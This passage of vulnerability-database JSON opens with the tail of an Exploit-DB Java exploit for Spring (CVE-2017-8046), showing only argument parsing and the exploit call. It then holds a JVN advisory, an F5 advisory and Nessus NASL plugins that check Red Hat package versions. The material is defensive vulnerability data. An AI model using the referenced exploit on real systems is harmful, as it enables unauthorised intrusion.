(\"--cookies\".equals(p)) {\r\n\r\n if (i + 1 > args.length - 1) {\r\n throw new IllegalArgumentException(\"Cookies must be passed, if specified.\");\r\n }\r\n o.setCookies(args[++i]);\r\n\r\n } else if (\"--clean\".equals(p)) {\r\n o.setCleanResponse(true);\r\n } else if (\"-v\".equals(p) || \"--verbose\".equals(p)) {\r\n o.setVerbose(true);\r\n }\r\n\r\n }\r\n\r\n // Performing the exploit.\r\n o.exploit();\r\n\r\n } else { // Wrong number of arguments.\r\n SpringBreakCve20178046.help();\r\n return;\r\n }\r\n\r\n } catch (URISyntaxException use) {\r\n System.out.println(\"[!] Input error (URI syntax exception): \" + use.getMessage());\r\n } catch (IllegalArgumentException iae) {\r\n System.out.println(\"[!] Input error (illegal argument): \" + iae.getMessage());\r\n } catch (Exception e) {\r\n System.out.println(\"[!] Unexpected exception: \" + e.getMessage());\r\n e.printStackTrace();\r\n }\r\n }\r\n\r\n}", "sourceHref": "https://www.exploit-db.com/download/44289", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "jvn": [{"lastseen": "2022-06-23T20:00:23", "description": "Spring Framework and Spring Security provided by Pivotal Software, Inc. contain an authentication bypass vulnerability.\n\n ## Impact\n\nA remote attacker can bypass authentication. As a result, the attacker gains access to the server and information may be disclosed.\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version according to the information provided by the developer.\n\n ## Products Affected\n\n * Spring Security 4.1.0 to 4.1.4\n * Spring Security 4.2.0 to 4.2.3\n * Spring Security 5.0.0\n * Spring Framework 4.3.0 to 4.3.13\n * Spring Framework 5.0.0 to 5.0.2\nThe developer states that \"_Older unmaintained versions of Spring Security & Spring Framework were not analyzed and may be impacted_\". \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-02-02T00:00:00", "type": "jvn", "title": "JVN#15643848: Spring Security and Spring Framework vulnerable to authentication bypass", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1199"], "modified": "2018-05-10T00:00:00", "id": "JVN:15643848", "href": "http://jvn.jp/en/jp/JVN15643848/index.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "f5": [{"lastseen": "2020-04-06T22:39:31", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2018-09-04T20:53:00", "type": "f5", "title": "Apache vulnerabilities CVE-2018-1282, CVE-2018-1284, CVE-2018-1295, CVE-2018-1308, and CVE-2018-1315", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1308", "CVE-2018-1295", "CVE-2018-1282", "CVE-2018-1315", "CVE-2018-1284"], "modified": "2018-09-04T20:53:00", "id": "F5:K12487579", "href": "https://support.f5.com/csp/article/K12487579", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-03-27T15:42:32", "description": "An update for rhvm-appliance is now available for Red Hat Virtualization 4 for RHEL 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe RHV-M Virtual Appliance automates the process of installing and configuring the Red Hat Virtualization Manager. The appliance is available to download as an OVA file from the Customer Portal.\n\nThe following packages have been upgraded to a later upstream version:\nrhvm-appliance (4.2). (BZ#1558801, BZ#1563545)\n\nSecurity Fix(es) :\n\n* python-paramiko: Authentication bypass in transport.py (CVE-2018-7750)\n\n* slf4j: Deserialisation vulnerability in EventData constructor can allow for arbitrary code execution (CVE-2018-8088)\n\n* undertow: Client can use bogus uri in Digest authentication (CVE-2017-12196)\n\n* jackson-databind: unsafe deserialization due to incomplete blacklist (incomplete fix for CVE-2017-7525 and CVE-2017-17485) (CVE-2018-5968)\n\n* ovirt-engine: account enumeration through login to web console (CVE-2018-1073)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Chris McCown for reporting CVE-2018-8088.\nThe CVE-2017-12196 issue was discovered by Jan Stourac (Red Hat).\n\nEnhancement(s) :\n\n* Previously, the default memory allotment for the RHV-M Virtual Appliance was always large enough to include support for user additions.\n\nIn this release, the RHV-M Virtual Appliance includes a swap partition that enables the memory to be increased when required. (BZ#1422982)\n\n* Previously, the partitioning scheme for the RHV-M Virtual Appliance included two primary partitions, '/' and swap.\n\nIn this release, the disk partitioning scheme has been modified to match the scheme specified by NIST. The updated disk partitions are as follows :\n\n/boot 1G (primary) /home 1G (lvm) /tmp 2G (lvm) /var 20G (lvm) /var/log 10G (lvm) /var/log/audit 1G (lvm) swap 8G (lvm) / 6G (primary) (BZ#1463853)\n\n* Previously, the version tag was used as part of the RPM's naming scheme, for example, '4.1.timestamp', which created differences between the upstream and downstream versioning schemes. In this release, the downstream versioning scheme is aligned with the upstream scheme and the timestamp has moved from the version tag to the release tag. (BZ#1464486)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-18T00:00:00", "type": "nessus", "title": "RHEL 7 : Virtualization (RHSA-2018:1525)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12196", "CVE-2017-17485", "CVE-2017-7525", "CVE-2018-1073", "CVE-2018-1111", "CVE-2018-5968", "CVE-2018-7750", "CVE-2018-8088"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:rhvm-appliance", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2018-1525.NASL", "href": "https://www.tenable.com/plugins/nessus/109910", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:1525. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109910);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/10/24 15:35:44\");\n\n script_cve_id(\"CVE-2017-12196\", \"CVE-2018-1073\", \"CVE-2018-1111\", \"CVE-2018-5968\", \"CVE-2018-7750\", \"CVE-2018-8088\");\n script_xref(name:\"RHSA\", value:\"2018:1525\");\n\n script_name(english:\"RHEL 7 : Virtualization (RHSA-2018:1525)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for rhvm-appliance is now available for Red Hat\nVirtualization 4 for RHEL 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe RHV-M Virtual Appliance automates the process of installing and\nconfiguring the Red Hat Virtualization Manager. The appliance is\navailable to download as an OVA file from the Customer Portal.\n\nThe following packages have been upgraded to a later upstream version:\nrhvm-appliance (4.2). (BZ#1558801, BZ#1563545)\n\nSecurity Fix(es) :\n\n* python-paramiko: Authentication bypass in transport.py\n(CVE-2018-7750)\n\n* slf4j: Deserialisation vulnerability in EventData constructor can\nallow for arbitrary code execution (CVE-2018-8088)\n\n* undertow: Client can use bogus uri in Digest authentication\n(CVE-2017-12196)\n\n* jackson-databind: unsafe deserialization due to incomplete blacklist\n(incomplete fix for CVE-2017-7525 and CVE-2017-17485) (CVE-2018-5968)\n\n* ovirt-engine: account enumeration through login to web console\n(CVE-2018-1073)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nRed Hat would like to thank Chris McCown for reporting CVE-2018-8088.\nThe CVE-2017-12196 issue was discovered by Jan Stourac (Red Hat).\n\nEnhancement(s) :\n\n* Previously, the default memory allotment for the RHV-M Virtual\nAppliance was always large enough to include support for user\nadditions.\n\nIn this release, the RHV-M Virtual Appliance includes a swap partition\nthat enables the memory to be increased when required. (BZ#1422982)\n\n* Previously, the partitioning scheme for the RHV-M Virtual Appliance\nincluded two primary partitions, '/' and swap.\n\nIn this release, the disk partitioning scheme has been modified to\nmatch the scheme specified by NIST. The updated disk partitions are as\nfollows :\n\n/boot 1G (primary) /home 1G (lvm) /tmp 2G (lvm) /var 20G (lvm)\n/var/log 10G (lvm) /var/log/audit 1G (lvm) swap 8G (lvm) / 6G\n(primary) (BZ#1463853)\n\n* Previously, the version tag was used as part of the RPM's naming\nscheme, for example, '4.1.timestamp', which created differences\nbetween the upstream and downstream versioning schemes. In this\nrelease, the downstream versioning scheme is aligned with the upstream\nscheme and the timestamp has moved from the version tag to the release\ntag. (BZ#1464486)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:1525\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-12196\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-1073\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-1111\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5968\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-7750\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-8088\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rhvm-appliance package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'DHCP Client Command Injection (DynoRoot)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhvm-appliance\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/18\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:1525\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL7\", rpm:\"rhvm-appliance-4.2-\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Virtualization\");\n\n if (rpm_check(release:\"RHEL7\", reference:\"rhvm-appliance-4.2-20180504.0.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rhvm-appliance\");\n }\n}\n", "cvss": {"score": 7.9, "vector": "AV:A/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T15:34:38", "description": "An update for eap7-jboss-ec2-eap is now available for Red Hat JBoss Enterprise Application Platform 7.1.1 for Red Hat Enterprise Linux 6 and Red Hat JBoss Enterprise Application Platform 7.1.1 for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe eap7-jboss-ec2-eap packages provide scripts for Red Hat JBoss Enterprise Application Platform running on the Amazon Web Services (AWS) Elastic Compute Cloud (EC2).\n\nWith this update, the eap7-jboss-ec2-eap package has been updated to ensure compatibility with Red Hat JBoss Enterprise Application Platform 7.1.1\n\nRefer to the JBoss Enterprise Application Platform 7.1 Release Notes, linked to in the References section, for information on the most significant bug fixes and enhancements included in this release.\n\nSecurity Fix(es) :\n\n* artemis/hornetq: memory exhaustion via UDP and JGroups discovery (CVE-2017-12174)\n\n* infinispan: Unsafe deserialization of malicious object injected into data cache (CVE-2017-15089)\n\n* jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-7525) (CVE-2017-15095)\n\n* jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-15095) (CVE-2017-17485)\n\n* resteasy: Vary header not added by CORS filter leading to cache poisoning (CVE-2017-7561)\n\n* undertow: Client can use bogus uri in Digest authentication (CVE-2017-12196)\n\n* undertow: ALLOW_ENCODED_SLASH option not taken into account in the AjpRequestParser (CVE-2018-1048)\n\n* jackson-databind: unsafe deserialization due to incomplete blacklist (incomplete fix for CVE-2017-7525 and CVE-2017-17485) (CVE-2018-5968)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-14T00:00:00", "type": "nessus", "title": "RHEL 6 / 7 : JBoss EAP (RHSA-2018:0481)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12174", "CVE-2017-12196", "CVE-2017-15089", "CVE-2017-15095", "CVE-2017-17485", "CVE-2017-7525", "CVE-2017-7561", "CVE-2018-1048", "CVE-2018-5968"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:eap7-jboss-ec2-eap", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-ec2-eap-samples", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2018-0481.NASL", "href": "https://www.tenable.com/plugins/nessus/108325", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:0481. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108325);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/10/24 15:35:44\");\n\n script_cve_id(\"CVE-2017-12174\", \"CVE-2017-12196\", \"CVE-2017-15089\", \"CVE-2017-15095\", \"CVE-2017-17485\", \"CVE-2017-7561\", \"CVE-2018-1048\", \"CVE-2018-5968\");\n script_xref(name:\"RHSA\", value:\"2018:0481\");\n\n script_name(english:\"RHEL 6 / 7 : JBoss EAP (RHSA-2018:0481)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for eap7-jboss-ec2-eap is now available for Red Hat JBoss\nEnterprise Application Platform 7.1.1 for Red Hat Enterprise Linux 6\nand Red Hat JBoss Enterprise Application Platform 7.1.1 for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe eap7-jboss-ec2-eap packages provide scripts for Red Hat JBoss\nEnterprise Application Platform running on the Amazon Web Services\n(AWS) Elastic Compute Cloud (EC2).\n\nWith this update, the eap7-jboss-ec2-eap package has been updated to\nensure compatibility with Red Hat JBoss Enterprise Application\nPlatform 7.1.1\n\nRefer to the JBoss Enterprise Application Platform 7.1 Release Notes,\nlinked to in the References section, for information on the most\nsignificant bug fixes and enhancements included in this release.\n\nSecurity Fix(es) :\n\n* artemis/hornetq: memory exhaustion via UDP and JGroups discovery\n(CVE-2017-12174)\n\n* infinispan: Unsafe deserialization of malicious object injected into\ndata cache (CVE-2017-15089)\n\n* jackson-databind: Unsafe deserialization due to incomplete black\nlist (incomplete fix for CVE-2017-7525) (CVE-2017-15095)\n\n* jackson-databind: Unsafe deserialization due to incomplete black\nlist (incomplete fix for CVE-2017-15095) (CVE-2017-17485)\n\n* resteasy: Vary header not added by CORS filter leading to cache\npoisoning (CVE-2017-7561)\n\n* undertow: Client can use bogus uri in Digest authentication\n(CVE-2017-12196)\n\n* undertow: ALLOW_ENCODED_SLASH option not taken into account in the\nAjpRequestParser (CVE-2018-1048)\n\n* jackson-databind: unsafe deserialization due to incomplete blacklist\n(incomplete fix for CVE-2017-7525 and CVE-2017-17485) (CVE-2018-5968)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/documentation/en-us/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:0481\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-7561\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-12174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-12196\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-15089\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-15095\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-17485\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-1048\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5968\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected eap7-jboss-ec2-eap and / or\neap7-jboss-ec2-eap-samples packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-ec2-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-ec2-eap-samples\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:0481\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"jbossas-welcome-content-eap\") || rpm_exists(release:\"RHEL7\", rpm:\"jbossas-welcome-content-eap\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-ec2-eap-7.1.1-3.1.GA_redhat_3.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-jboss-ec2-eap-samples-7.1.1-3.1.GA_redhat_3.ep7.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-ec2-eap-7.1.1-3.1.GA_redhat_3.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-ec2-eap-samples-7.1.1-3.1.GA_redhat_3.ep7.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"eap7-jboss-ec2-eap / eap7-jboss-ec2-eap-samples\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:32:25", "description": "An update is now available for Red Hat JBoss Enterprise Application Platform 7.1 for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server.\n\nThis release of Red Hat JBoss Enterprise Application Platform 7.1.1 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.1.0, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* artemis/hornetq: memory exhaustion via UDP and JGroups discovery (CVE-2017-12174)\n\n* infinispan: Unsafe deserialization of malicious object injected into data cache (CVE-2017-15089)\n\n* jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-7525) (CVE-2017-15095)\n\n* jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-15095) (CVE-2017-17485)\n\n* resteasy: Vary header not added by CORS filter leading to cache poisoning (CVE-2017-7561)\n\n* undertow: Client can use bogus uri in Digest authentication (CVE-2017-12196)\n\n* undertow: ALLOW_ENCODED_SLASH option not taken into account in the AjpRequestParser (CVE-2018-1048)\n\n* jackson-databind: unsafe deserialization due to incomplete blacklist (incomplete fix for CVE-2017-7525 and CVE-2017-17485) (CVE-2018-5968)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-14T00:00:00", "type": "nessus", "title": "RHEL 7 : JBoss EAP (RHSA-2018:0480)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12174", "CVE-2017-12196", "CVE-2017-15089", "CVE-2017-15095", "CVE-2017-17485", "CVE-2017-7525", "CVE-2017-7561", "CVE-2018-1048", 